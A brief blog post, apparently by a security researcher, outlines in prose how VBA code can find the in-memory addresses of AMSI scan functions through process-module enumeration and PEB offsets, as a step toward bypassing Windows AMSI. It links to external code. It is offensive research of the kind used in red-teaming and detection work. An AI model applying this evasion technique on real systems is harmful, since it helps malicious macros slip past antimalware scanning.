I’ve written a few posts which are all about AMSI and VBA recently and have hopefully shown that bypassing it is pretty trivial and can be done in a number of different ways. I just wanted to document one more combination of techniques that can be used to get the address of AMSIScanString and AmsiScanBuffer without the use of LoadLibrary and GetProcAddress.

We can use EnumProcessModules to retrieve a handle for each module in a specified process.

We can then use GetModuleBaseName to establish whether it’s amsi.dll, which is the one we’re on the hunt for.

If we establish we have the handle for amsi.dll we can then use GetModuleInformation to get the BaseAddress of amsi.dll in memory.

Once we have the dll base address we can use the static PEB offsets see earlier post about PEB walking and walking half the PEB to retrieve our function addresses.

Code is on my Git
https://github.com/rmdavy/enumprocmodules

Leave a Reply

Your email address will not be published. Required fields are marked *